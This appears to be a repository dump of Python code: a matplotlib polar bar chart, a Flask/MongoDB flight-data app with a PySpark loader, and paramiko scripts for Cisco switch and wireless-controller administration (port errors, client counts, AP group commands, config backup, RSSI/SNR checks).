color.append(shash['color_dev'])\n else: color.append(color_dev)\n if 'color_norm' in shash: color.append(shash['color_norm'])\n else: color.append(color_norm)\n cols.append(color)\n\nif len(yvals)==0: \n print \"No valid columns found!\"\n usage_example()\n sys.exit()\n\nwidth = 2*np.pi/len(yvals)\nfor i in range(len(yvals)):\n xvals.append(i*width)\nbeg = 0\nwhile beg<len(ltmp):\n lbl = ltmp[beg]\n end = beg\n while end<len(ltmp) and ltmp[end]==lbl: end += 1\n xval = (xvals[beg]+xvals[end-1]+width)*0.5\n xlbls.append(xval)\n lbls.append(lbl)\n if beg==end: beg = end + 1\n else: beg = end\n\n\nax = plt.subplot(111, projection='polar')\nbars = ax.bar(xvals, yvals, 
width=width, bottom=0.0)\n\nax.axes.get_xaxis().grid(False)\n#ax.grid(False)\nax.spines['polar'].set_visible(False) # do not draw axis border\nax.set_xticks([])\n#ax.set_rlabel_position(0)\nax.tick_params(axis='both', which='major', labelsize=9)\n\n# Highlight tick at 1?\n# for g,t,l in zip(ax.get_ygridlines(),ax.get_yticks(),ax.get_yticklabels()):\n# if t==1:\n# #l.set_color('#D43F3A')\n# g.set_color('#D43F3A')\n# g.set_linewidth(2)\n# g.set_linestyle(':')\n\nyticks = ax.get_yticks() # to get the distance of labels right\n\n# hide the outer grid circle and replace it with segments\nleg = {}\ng = ax.get_ygridlines()\ng[-1].set_linestyle('none')\nfor i in range(len(yvals)):\n beg = i*width\n end = (i+1)*width\n ax.plot(np.linspace(beg, end, 10), np.ones(10), color=cols[i][0], linestyle='-', linewidth=4)\n leg[cols[i][0]] = sgrp[i]\n\n# Legend\nleg_rect = []\nleg_lbl = []\nfor col in leg:\n rect = patches.Rectangle((0,0), 0.1, 0.1, color=col)\n leg_rect.append(rect)\n leg_lbl.append(leg[col])\nleg_rect.append(patches.Rectangle((0,0), 0.1, 0.1, color='grey', alpha=0.4))\nleg_lbl.append('Not statistically significant')\nplt.legend(leg_rect,leg_lbl,prop={'size':9},frameon=False,bbox_to_anchor=(0.98,0.98),bbox_transform=plt.gcf().transFigure)\n\n# Radial text labels\nfor i in range(len(xlbls)):\n angle_rad = xlbls[i]\n angle_deg = angle_rad*180/np.pi\n ha = \"left\"\n rot = angle_deg\n if angle_rad > np.pi/2 and angle_rad < np.pi*3/2.: \n ha = \"right\"\n rot = angle_deg - 180\n plt.text(angle_rad, yticks[-1]+0.05, lbls[i], size=9, horizontalalignment=ha, \n verticalalignment=\"center\", rotation=rot, rotation_mode='anchor')\n\n# L/R sub-labels\nfor i in range(len(lbls2)):\n if lbls2[i]==None: continue\n angle_rad = i*width+width*0.5\n angle_deg = angle_rad*180/np.pi - 90\n ha = \"left\"\n rot = angle_deg\n plt.text(angle_rad, yticks[-1]-0.08, lbls2[i], size=9, horizontalalignment=ha, verticalalignment=\"center\", rotation=rot, rotation_mode='anchor',color='#555555')\n\nfor x,y,color,bar in zip(xvals, yvals, cols, bars):\n if abs(y-1) > dev:\n bar.set_facecolor(color[0])\n bar.set_edgecolor(color[0])\n bar.set_alpha(0.7)\n else:\n bar.set_facecolor(color[1])\n bar.set_edgecolor(color[1])\n bar.set_alpha(0.4)\n\nplt.subplots_adjust(left=0.0,right=0.85,bottom=0.15,top=0.85)\nplt.savefig(out_file)\nplt.close()\n\n\n" } ]
2
dylanbking97/big-fun-data
https://github.com/dylanbking97/big-fun-data
b20b7d39521d87a3511e025fa13986fd8219eda3
88403bdc75934f5d051c27406538e1518f03596b
233ddb809a38c54a0697b8398978f478eca6c44d
refs/heads/master
2020-07-11T15:41:07.999605
2019-08-28T05:52:10
2019-08-28T05:52:10
204,587,068
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7068119645118713, "alphanum_fraction": 0.7079018950462341, "avg_line_length": 38.89130401611328, "blob_id": "0354b9ea1a4a098e1994ab66973e8e19f38f3035", "content_id": "3b8c9d8db4abe8ce8baaa8e940805dd4b623aba2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1835, "license_type": "no_license", "max_line_length": 111, "num_lines": 46, "path": "/controller.py", "repo_name": "dylanbking97/big-fun-data", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, request\nfrom pymongo import MongoClient\nfrom bson import json_util\nimport setup\n\n# Set up Flask and Mongo\napp = Flask(__name__)\nclient = MongoClient()\n\[email protected](\"/on_time_performance\")\ndef on_time_performance():\n carrier = request.args.get('Carrier')\n flight_date = request.args.get('FlightDate')\n flight_num = request.args.get('FlightNum')\n flight = client.agile_data_science.on_time_performance.find_one({\n 'Carrier': carrier,\n 'FlightDate': flight_date,\n 'FlightNum': flight_num\n })\n \n return render_template('flight.html', flight=flight)\n\n# Controller: Fetch all flights between cities on a given day and display them\[email protected](\"/flights/<origin>/<dest>/<flight_date>\")\ndef list_flights(origin, dest, flight_date):\n \n flights = client.agile_data_science.on_time_performance.find({\n 'Origin': origin, 'Dest': dest, 'FlightDate': flight_date},\n sort = [('DepTime', 1),('ArrTime', 1)])\n \n flight_count = flights.count()\n return render_template('flights.html', flights=flights, flight_date=flight_date, flight_count=flight_count)\n\n# Fetch all flights made by a particular airplane, identified by its tail number\[email protected](\"/airplane/flights/<tail_number>\")\ndef flights_per_airplane(tail_number):\n flights = client.agile_data_science.flights_per_airplane.find_one({'TailNum': tail_number})\n return render_template('flights_per_airplane.html', flights=flights, tail_number=tail_number)\n\[email protected](\"/airline/<carrier_code>\")\ndef airline(carrier_code):\n airline_airplanes = client.agile_data_science.airplanes_per_carrier.find({'Carrier': carrier_code})\n return render_template('airlines.html',airline_airplanes=airline_airplanes,carrier_code=carrier_code)\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n" }, { "alpha_fraction": 0.7267851829528809, "alphanum_fraction": 0.7369461059570312, "avg_line_length": 54.34375, "blob_id": "4bc1075af16e544ba7d7df5d7d3b54f9684d2cfe", "content_id": "ad96ca903e5a14872e655b8ed9adfa3f393887be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3543, "license_type": "no_license", "max_line_length": 137, "num_lines": 64, "path": "/setup.py", "repo_name": "dylanbking97/big-fun-data", "src_encoding": "UTF-8", "text": "import pymongo\nimport pymongo_spark\n\non_time_dataframe = spark.read.format('com.databricks.spark.csv.options(header='true',treatEmptyValuesAsNulls='true',)/\n .load('data/On_Time_On_Time_Performance_2015.csv.bz2'))\n \non_time_dataframe.registerTempTable(\"on_time_performance\")\n\ntrimmed_cast_performance = spark.sql(\"\"\"SELECT Year, Quarter, Month, DayofMonth, DayOfWeek, FlightDate, Carrier, TailNum, FlightNum,\nOrigin, OriginCityName, OriginState, Dest, DestCityName, DestState, DepTime, cast(DepDelay as float), cast(DepDelayMinutes as int),\ncast(TaxiOut as float), cast(TaxiIn as float), WheelsOff, WheelsOn, ArrTime, cast(ArrDelay as float), cast(ArrDelayMinutes as 
float),\ncast(Cancelled as int), cast(Diverted as int), cast(ActualElapsedTime as float), cast(AirTime as float), cast(Flights as int), \ncast(Distance as float), cast(CarrierDelay as float), cast(WeatherDelay as float), cast(NASDelay as float), cast(SecurityDelay as float),\ncast(LateAircraftDelay as float), CRSDepTime, CRSArrTime FROM on_time_performance\"\"\") \n\n# Replace on_time_performance table with our new, trimmed table and show its columns\ntrimmed_cast_performance.registerTempTable(\"on_time_performance\")\n#trimmed_cast_performance.show()\n\n\ntrimmed_cast_performance.write.parquet(\"data/on_time_performance.parquet\")\non_time_dataframe = spark.read.parquet('data/on_time_performance.parquet') \n\n\npymongo_spark.activate()\n\n#convert each row to a dict\nas_dict = on_time_dataframe.rdd.map(lambda row: row.asDict())\n\n#This collection acts as a base table containing all information about the flights\nas_dict.saveToMongoDB('mongodb://localhost:27017/agile_data_science.on_time_performance')\n\n#Create an index that will speed up queries for getting all flights from one airport to another, on a given date\ndb.on_time_performance.ensureIndex({Origin: 1, Dest: 1, FlightDate: 1})\n\n\n#Create an airplane entity, identifiable by its tail number\n\n# Filter down to the fields we need to identify and link to a flight\nflights = on_time_dataframe.rdd.map(lambda x:(x.Carrier, x.FlightDate, x.FlightNum, x.Origin, x.Dest, x.TailNum))\n\nflights_per_airplane = flights.map(lambda nameTuple: (nameTuple[5], [nameTuple[0:5]]))\\\n.reduceByKey(lambda a, b: a + b)\\\n.map(lambda tuple:{'TailNum': tuple[0], 'Flights': sorted(tuple[1], key=lambda x: (x[1], x[2]))})\n\npymongo_spark.activate()\n\n#This table contains a basic flight history for each airplane\nflights_per_airplane.saveToMongoDB('mongodb://localhost:27017/agile_data_science.flights_per_airplane')\n\n#Create an index for the quickly fetching all of the flights for a given airplane (identified by tail number)\ndb.flights_per_airplane.ensureIndex({\"TailNum\": 1})\n\n\n# Get all unique tail numbers for each airline\non_time_dataframe.registerTempTable(\"on_time_performance\")\ncarrier_airplane = spark.sql(\"SELECT DISTINCT Carrier, TailNum FROM on_time_performance\")\n# Now we need to store a sorted list of tail numbers for each carrier, along with a fleet count\nairplanes_per_carrier = carrier_airplane.rdd.map(lambda nameTuple: (nameTuple[0], [nameTuple[1]]))\\\n.reduceByKey(lambda a, b: a + b).map(lambda tuple:\n {'Carrier': tuple[0],'TailNumbers': sorted(filter(lambda x: x != '', tuple[1])),'FleetCount': len(tuple[1])})\n\n#This collection contains the fleet of each airplane carrier\nairplanes_per_carrier.saveToMongoDB('mongodb://localhost:27017/agile_data_science.airplanes_per_carrier')\n\n" } ]
2
mcs618/NetProjects
https://github.com/mcs618/NetProjects
7cf7544c993e027f4e2084873b850729e88a75bd
db1b0799394b8d439b3b52249ea7e97b05d229a9
7021b3dd8ffc9580f6afbcfb184b05f8fbc31a04
refs/heads/master
2020-03-22T02:15:10.101338
2019-01-30T22:32:51
2019-01-30T22:32:51
139,359,187
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5541666746139526, "alphanum_fraction": 0.5769230723381042, "avg_line_length": 24.365854263305664, "blob_id": "6b40163a41b1c13aa4cc33cb603ae5716946c094", "content_id": "efa79e585cd763ba8f9765f6ee978c889e3fec45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3120, "license_type": "no_license", "max_line_length": 110, "num_lines": 123, "path": "/error_detect/error_detect_0.30d.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.30d\n# port error detector\n# mcs\n# 5/1/2017\n#\n# rows 0 - 8\n\nimport paramiko\nimport time\nimport re\n\nip_addr = '192.168.1.204'\nusername = 'admin'\npassword = 'mcs618'\n\nremote_conn_pre = paramiko.SSHClient()\nremote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nremote_conn_pre.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\nremote_conn = remote_conn_pre.invoke_shell()\nremote_conn.send(\"terminal length 0\" + \"\\n\")\nremote_conn.send(\"show ip int brief\" + \"\\n\")\ntime.sleep(1)\noutp = remote_conn.recv(5000)\nmystring = outp.decode(\"utf-8\")\nipbrieflist = mystring.splitlines()\nhostnamelist = ipbrieflist[1].split('>')\nhostname = hostnamelist[0]\nipbrieflen = int(len(ipbrieflist) - 5)\ndel ipbrieflist[:4]\ndel ipbrieflist[ipbrieflen]\nprint()\n\nipbriefRegex = re.compile(r'(\\S+)(.+)')\n\nipbriefintlist = []\nfor elem in ipbrieflist:\n mo = ipbriefRegex.search(elem)\n if (mo.group(1)).startswith('Loop') or (mo.group(1)).startswith('Vlan'):\n continue\n ipbriefintlist.append(mo.group(1))\n\nprint(\"*********\")\nprint(ipbriefintlist[0])\nprint(ipbriefintlist[1])\nprint(\"*********\")\nprint()\nprint(hostname)\n\nfor intf in ipbriefintlist:\n print(\"*****\")\n print(\"Interface \" + intf)\n remote_conn.send(\"show int \" + intf + \"\\n\")\n time.sleep(1)\n outp = remote_conn.recv(5000)\n shintstring = outp.decode(\"utf-8\")\n shintlist = shintstring.splitlines()\n \n if not shintlist[3].startswith(' Internet'):\n shintlen = int(len(shintlist) - 20)\n del shintlist[:19]\n del shintlist[shintlen]\n else:\n shintlen = int(len(shintlist) - 21)\n del shintlist[:20]\n del shintlist[shintlen]\n\n def striplist(errlist):\n return [item.strip() for item in errlist]\n\n errdict = {}\n for line in shintlist:\n errors_list = striplist(line.split(\",\"))\n\n errRegex = re.compile(r'(\\d+)(\\s)(\\D+)')\n\n for elem in errors_list:\n mo = errRegex.search(elem)\n errdict[mo.group(3)] = int(mo.group(1))\n\n if len(errdict) == 21:\n del errdict['packets output']\n del errdict['bytes']\n for k, v in errdict.items():\n print(k, v)\n\n print()\n\n # if counter = 19 and value = 0, continue\n \n # if len(errdict) == 21:\n # for k, v in errdict.items():\n # print(k, v)\n # print()\n \n # for elem in errors_list:\n # mo = errRegex.search(elem)\n # errdict[mo.group(3)] = int(mo.group(1))\n # if int(mo.group(1)) > 0:\n # print(\"There are errors\")\n # else:\n # print(\"There are no errors\")\n\n # print(errdict)\n \n # Model for how to bypass unwanted lines\n\nfile = ['beef', 'string1', 'veal', 'string2', 'pork', 'string3', 'chicken']\nstrings = (\n \"string1\",\n \"string2\",\n \"string3\"\n)\n\nfor item in file:\n if any(s in item for s in strings):\n print(\"yay!\")\n else:\n continue\n \n------------------------\n\nfor k, v in dict.items():\n\t print(k,v)\n" }, { "alpha_fraction": 0.48430493474006653, "alphanum_fraction": 0.5007473826408386, "avg_line_length": 29.409090042114258, "blob_id": 
"45fbfa113c8b52dbaa64db811d12ca035c623494", "content_id": "bf3498be6ac3587c95881e349c4eb7ac43c07593", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 669, "license_type": "no_license", "max_line_length": 81, "num_lines": 22, "path": "/Clients_per_AP/clients_per_ap.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "import re\nfrom collections import defaultdict\n\nclient_sum = \"d:\\\\python\\\\projects\\\\Clients_per_AP\\\\show_client_summary.txt\"\nper_AP = \"d:\\\\python\\\\projects\\\\Clients_per_AP\\\\Clients_per_AP.txt\"\n\nd = defaultdict(int)\n\nwith open(per_AP, 'w') as pap:\n with open(client_sum, 'r') as cs:\n for line in cs:\n regex = re.compile(r'([0-9a-f]{2}[:-]){5}([0-9a-f]{2})(\\s)(.+?)(\\s)')\n mo = regex.search(line)\n ap_name = mo.group(4)\n\n d[ap_name] += 1\n\n for k, v in d.items():\n if v > 5:\n print(k, \":\", v, \" <----- Client count greater than 5.\")\n else:\n print(k, \":\", v)\n" }, { "alpha_fraction": 0.5296052694320679, "alphanum_fraction": 0.5460526347160339, "avg_line_length": 28.419355392456055, "blob_id": "3f50aae61fe04352a44882afa58c4440b3f70788", "content_id": "4996f5a5bdfb815a4d86d622503571f477327d83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 912, "license_type": "no_license", "max_line_length": 81, "num_lines": 31, "path": "/migrate_APs/assign_to_AP-group.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "Text = \"d:\\\\python\\\\projects\\\\migrate_APs\\\\show_ap_summary.txt\"\nnewfile = \"d:\\\\python\\\\projects\\\\migrate_APs\\\\assign_to_AP_group.txt\"\n\nignore = ('(Cisco Controller)',\n 'Number of APs',\n 'Global AP username',\n 'Global AP User Name',\n 'Global AP Dot1x username',\n 'Global AP Dot1x User Name',\n 'AP Name',\n '----------')\n\napnamelist = []\nwith open(Text, 'r') as fh:\n for line in fh:\n if line.startswith(ignore) or len(line) <= 1:\n continue\n templist = line.split()\n apnamelist.append(templist[0])\n\nAP_group_name = 'GB-AP-Group'\n\nwith open(newfile, \"a\") as file2:\n counter = 0\n for name in apnamelist:\n file2.write(\"config ap group-name {0} {1}\\n\".format(AP_group_name, name))\n file2.write('y\\n')\n counter += 1\n if counter == 20:\n file2.write(\"\\n\")\n counter = 0\n" }, { "alpha_fraction": 0.5474327802658081, "alphanum_fraction": 0.5721271634101868, "avg_line_length": 27.40277862548828, "blob_id": "84f3fc9d077c6e64588614201c38702a08daa54e", "content_id": "c9afe7e28bd89b15f6fe93becdfcf86ced2450b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4090, "license_type": "no_license", "max_line_length": 111, "num_lines": 144, "path": "/Clients_per_AP/clients_per_ap_v3.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.30\n# show client summary processing\n# @author mcs\n# 4/24/2018\n\n# https://stackoverflow.com/questions/41879712/python-list-of-lists-to-dataframe-assertionerror\n\n# https://stackoverflow.com/questions/42869544/dictionary-of-lists-to-dataframe\n\n# https://stackoverflow.com/questions/25292568/converting-a-dictionary-with-lists-for-values-into-a-dataframe\n\n\nimport paramiko\nimport time\nimport re\n# import json\nimport csv\nfrom collections import defaultdict\n\n\ndef csv_reader(csvfile):\n \"\"\"Read CSV file, return a list of devices.\"\"\"\n device_list = []\n with open(csvfile, \"r\") as datafile:\n datareader = csv.DictReader(datafile)\n 
for row in datareader:\n if datareader.line_num == 1:\n continue\n ip_addr = row['IP_address']\n username = row['Username']\n password = row['Password']\n device_dict = {'ip_addr': ip_addr, 'username': username, 'password': password}\n # add device to device_list\n device_list.append(device_dict)\n\n return device_list\n\n\ndef login(ip_addr, username, password):\n \"\"\"Establish SSH connection, return SSH conn object.\"\"\"\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\n ssh_channel = ssh.invoke_shell()\n ssh_channel.send(\"\\n\")\n ssh_channel.send(username + \"\\n\")\n ssh_channel.send(password + \"\\n\")\n # Need to return both ssh and ssh_channel\n return ssh, ssh_channel\n\n\ndef ap_data(ssh_channel):\n ssh_channel.send(\"config paging disable\" + \"\\n\")\n time.sleep(0.9)\n discard = ssh_channel.recv(10000)\n ssh_channel.send(\"show ap summary\" + \"\\n\")\n time.sleep(0.9)\n outp = ssh_channel.recv(100000)\n shapsumstring = outp.decode(\"utf-8\")\n shapsumlist = shapsumstring.splitlines()\n shapsumlist = shapsumlist[9:-2]\n regex1 = re.compile(r'(.+?)(?: 2)')\n\n d = defaultdict(int)\n e = {}\n\n for line in shapsumlist:\n mo = regex1.search(line)\n ap_name = mo.group(1).rstrip()\n e[ap_name] = []\n\n c = 0\n x = 0\n starttime = time.time()\n while x < 5:\n\n ssh_channel.send(\"show client summary\" + \"\\n\")\n\n time.sleep(0.9)\n outp = ssh_channel.recv(150000)\n shclisumstring = outp.decode(\"utf-8\")\n shclisumlist = shclisumstring.splitlines()\n # print(\"shclisumlist.splitlines(): {}\".format(shclisumlist))\n\n del shclisumlist[:12]\n del shclisumlist[-3:]\n\n regex2 = re.compile(r'(?:(?:(?:[0-9a-f]{2}[:-]){5})(?:[0-9a-f]{2}))(?:\\s)(.+?)(?:\\s)')\n\n for line in shclisumlist:\n mo = regex2.search(line)\n ap_name = mo.group(1)\n d[ap_name] += 1\n\n for k, v in d.items():\n e[k].append(v)\n\n d.clear()\n shclisumstring = ''\n shclisumlist.clear()\n\n for key in e:\n if len(e[key]) == c:\n e[key].append(0)\n c += 1\n\n if x == 4:\n print()\n print('{:25}{:1}'.format(' AP', ' Count', ))\n print('=' * 43)\n\n for k, v in e.items():\n print('{:25}'.format(k), end='')\n for i in v:\n print('{:6}'.format(i), end='')\n print()\n break\n\n time.sleep(15.0 - ((time.time() - starttime) % 15.0))\n\n x += 1\n\n\ndef main():\n # Get all devices from csv_file\n csvfile = \"d:\\python\\projects\\Clients_per_AP\\SwitchData.csv\"\n device_list = csv_reader(csvfile)\n\n # Establish SSH connections\n ssh_conns = []\n ssh_save = []\n for a_device in device_list:\n ssh_pre, ssh_conn = login(**a_device)\n # Save the SSH connection to a list\n ssh_conns.append(ssh_conn)\n # Save the SSH preliminary connection to a separate list just to avoid a problem that otherwise happens\n ssh_save.append(ssh_pre)\n\n for a_connection in ssh_conns:\n ap_data(a_connection)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5108038187026978, "alphanum_fraction": 0.5401901602745056, "avg_line_length": 29.447368621826172, "blob_id": "dbb6a13109fa5198bf74171ceb263aca586d99cf", "content_id": "0a983c8a64bc6339b18a011956587476d777f6e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2314, "license_type": "no_license", "max_line_length": 115, "num_lines": 76, "path": "/config_backup/config_backup.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# @version 0.1\n# device 
backup\n# @author mcs\n# 5/18/2017\n\nimport paramiko\nimport csv\nimport time\nimport os\n\n\ncsvfile = \"d:\\\\mark\\\\python\\\\Projects\\\\error_detect\\\\SwitchData.csv\"\n\nwith open(csvfile, \"r\") as datafile:\n datareader = csv.DictReader(datafile)\n for row in datareader:\n if datareader.line_num == 1:\n continue\n ip_addr = row['IP_address']\n username = row['Username']\n password = row['Password']\n\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\n ssh_channel = ssh.invoke_shell()\n\n ssh_channel.send(\"enable\" + \"\\n\")\n time.sleep(0.3)\n outp = ssh_channel.recv(1000)\n output = outp.decode(\"utf-8\")\n if 'Password:' in output:\n ssh_channel.send(password + \"\\n\")\n time.sleep(0.3)\n outp = ssh_channel.recv(1000)\n output = outp.decode(\"utf-8\")\n hostlist = output.splitlines()\n hostname1 = hostlist[1]\n hostname = hostname1[:-1]\n\n ssh_channel.send(\"config t\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"file prompt quiet\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"exit\" + \"\\n\")\n time.sleep(0.3)\n\n today = time.strftime(\"%x\")\n timenow = time.strftime(\"%X\")\n filename = (hostname + '-' + '%s' + '_' + '%s') % (today, timenow)\n filename = filename.replace(\"/\", \"-\")\n filename = filename.replace(\":\", \"-\")\n \n if os.path.isfile(\"flash:vlan.dat\"):\n ssh_channel.send(\"copy flash:vlan.dat flash:\" + filename + \".dat\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"copy flash:\" + filename + \".dat\" \" tftp://192.168.1.106/\" + filename + \".dat\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"copy run tftp://192.168.1.106/\" + filename + \".cfg\" + \"\\n\")\n time.sleep(0.3)\n \n ssh_channel.send(\"config t\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"file prompt noisy\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"exit\" + \"\\n\")\n time.sleep(0.3)\n \n ssh_channel.send(\"exit\" + \"\\n\")\n time.sleep(0.3)\n" }, { "alpha_fraction": 0.5354330539703369, "alphanum_fraction": 0.5511810779571533, "avg_line_length": 28.633333206176758, "blob_id": "b03ab8fbb842ea582c6772e6d4f5aefae08448e9", "content_id": "28f61abdb2889b5194cff100adacd1c3bae349ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 889, "license_type": "no_license", "max_line_length": 91, "num_lines": 30, "path": "/migrate_APs/assign_to_flexconnect-group.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "Text = \"d:\\\\python\\\\projects\\\\migrate_APs\\\\show_ap_summary.txt\"\nnewfile = \"d:\\\\python\\\\projects\\\\migrate_APs\\\\assign_to_flex_group.txt\"\n\nignore = ('(Cisco Controller)',\n 'Number of APs',\n 'Global AP username',\n 'Global AP User Name',\n 'Global AP Dot1x username',\n 'Global AP Dot1x User Name',\n 'AP Name',\n '----------')\n\napmaclist = []\nwith open(Text, 'r') as fh:\n for line in fh:\n if line.startswith(ignore) or len(line) <= 1:\n continue\n templist = line.split()\n apmaclist.append(templist[3])\n\nAP_group_name = 'MT_Flex'\n\nwith open(newfile, \"a\") as file2:\n counter = 0\n for mac in apmaclist:\n file2.write(\"config flexconnect group {0} ap add {1}\\n\".format(AP_group_name, mac))\n counter += 1\n if counter == 20:\n file2.write(\"\\n\")\n counter = 0\n" }, { "alpha_fraction": 0.5357698202133179, "alphanum_fraction": 0.5520995259284973, "avg_line_length": 30.365854263305664, "blob_id": 
"205015c0d9f5e4d1585c8a9089af87003b99a1af", "content_id": "53b6216f1e7d343e12f9cedbe6be1090d092d656", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5144, "license_type": "no_license", "max_line_length": 111, "num_lines": 164, "path": "/rssi_snr/rssi_snr_v030.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.30\n# rssi snr processing\n# @author mcs\n# 4/12/2018\n\n# https://stackoverflow.com/questions/4915920/how-to-delete-an-item-in-a-list-if-it-exists\n\n# https://dbader.org/blog/python-generator-expressions\n\nimport paramiko\nimport time\nimport re\n# import json\nimport csv\nfrom collections import defaultdict\n\n \ndef csv_reader(csvfile):\n \"\"\"Read CSV file, return a list of devices.\"\"\"\n device_list = []\n with open(csvfile, \"r\") as datafile:\n datareader = csv.DictReader(datafile)\n for row in datareader:\n if datareader.line_num == 1:\n continue\n ip_addr = row['IP_address']\n username = row['Username']\n password = row['Password']\n device_dict = {'ip_addr': ip_addr, 'username': username, 'password': password}\n # add device to device_list\n device_list.append(device_dict)\n\n return device_list\n\n\ndef login(ip_addr, username, password):\n \"\"\"Establish SSH connection, return SSH conn object.\"\"\"\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\n ssh_channel = ssh.invoke_shell()\n ssh_channel.send(\"\\n\")\n ssh_channel.send(username + \"\\n\")\n ssh_channel.send(password + \"\\n\")\n # Need to return both ssh and ssh_channel\n return ssh, ssh_channel\n\n\ndef rssi_snr(ssh_channel):\n ssh_channel.send(\"config paging disable\" + \"\\n\")\n time.sleep(0.9)\n outp = ssh_channel.recv(25000)\n shclisumstring = outp.decode(\"utf-8\")\n shclisumstring = ''\n\n d = defaultdict(dict)\n\n x = 0\n starttime = time.time()\n while x < 1:\n\n ssh_channel.send(\"show client summary\" + \"\\n\")\n\n time.sleep(1.0)\n outp = ssh_channel.recv(150000)\n shclisumstring = outp.decode(\"utf-8\")\n shclisumlist = shclisumstring.splitlines()\n # print(\"shclisumlist.splitlines(): {}\".format(shclisumlist))\n\n del shclisumlist[:12]\n del shclisumlist[-3:]\n\n regex1 = re.compile(r'((?:(?:[0-9a-f]{2}[:-]){5})(?:[0-9a-f]{2}))')\n regex2 = re.compile(r'(.+?)(?:\\.+?\\s)(.*)')\n ap_MAC = set()\n\n # cleaned_list = [line for line in shclisumlist if 'AP5-Cafe_NW' in line]\n # AP5-213\n # AP5-ES_LMC\n\n ap = input(\"Please input the name of the AP we wish to examine: \")\n\n for line in (line for line in shclisumlist if ap in line):\n mo = regex1.search(line)\n ap_MAC.add(mo.group(1))\n\n ccounter = 1\n for mac in ap_MAC:\n ssh_channel.send(\"show client detail \" + mac + \"\\n\")\n\n time.sleep(1.0)\n outp = ssh_channel.recv(100000)\n shclidetstring = outp.decode(\"utf-8\")\n shclidetlist = shclidetstring.splitlines()\n # print(\"shclisumlist.splitlines(): {}\".format(shclisumlist))\n\n desired_info = []\n del shclidetlist[:1]\n del shclidetlist[111:]\n del shclidetlist[17:105]\n\n for line in shclidetlist:\n if line.startswith('Client MAC Address'):\n desired_info.append(line)\n break\n del shclidetlist[:9]\n for line in shclidetlist:\n if line.startswith('Wireless LAN Network Name'):\n desired_info.append(line)\n break\n del shclidetlist[:6]\n for line in shclidetlist:\n if line.startswith('IP Address'):\n desired_info.append(line)\n break\n del shclidetlist[:4]\n 
for line in shclidetlist:\n if line.startswith(' Radio Signal Strength Indicator'):\n desired_info.append(line)\n break\n for line in shclidetlist:\n if line.startswith(' Signal to Noise Ratio'):\n desired_info.append(line)\n break\n\n client = 'Client ' + str(ccounter)\n\n print(client)\n\n for line in desired_info:\n mo = regex2.search(line)\n d[client].update({mo.group(1).strip(): mo.group(2).strip()})\n\n ccounter += 1\n shclidetstring = ''\n shclidetlist.clear()\n\n x += 1\n\n for k, v in d.items():\n print(k, ' ', v)\n\n\ndef main():\n # Get all devices from csv_file\n csvfile = \"d:\\python\\projects\\Clients_per_AP\\SwitchData.csv\"\n device_list = csv_reader(csvfile)\n\n # Establish SSH connections\n ssh_conns = []\n ssh_save = []\n for a_device in device_list:\n ssh_pre, ssh_conn = login(**a_device)\n # Save the SSH connection to a list\n ssh_conns.append(ssh_conn)\n # Save the SSH preliminary connection to a separate list just to avoid a problem that otherwise happens\n ssh_save.append(ssh_pre)\n\n for a_connection in ssh_conns:\n rssi_snr(a_connection)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.45689791440963745, "alphanum_fraction": 0.4724559485912323, "avg_line_length": 36.052940368652344, "blob_id": "76cd2cefc471b3d525f61495d66046e7d253d782", "content_id": "cd7ae6332eebd94074ee19909775b0fec6629c6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6299, "license_type": "no_license", "max_line_length": 112, "num_lines": 170, "path": "/error_detect/error_detect_0.49.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.49\n# device port error report\n# mcs\n# 6/2/2017\n\nimport paramiko\nimport time\nimport re\nimport json\nimport csv\n\n\ndef errordetect():\n csvfile = \"f:\\\\mark\\\\python\\\\Projects\\\\error_detect\\\\SwitchData.csv\"\n\n with open(csvfile, \"r\") as datafile:\n datareader = csv.DictReader(datafile)\n for row in datareader:\n if datareader.line_num == 1:\n continue\n ip_addr = row['IP_address']\n username = row['Username']\n password = 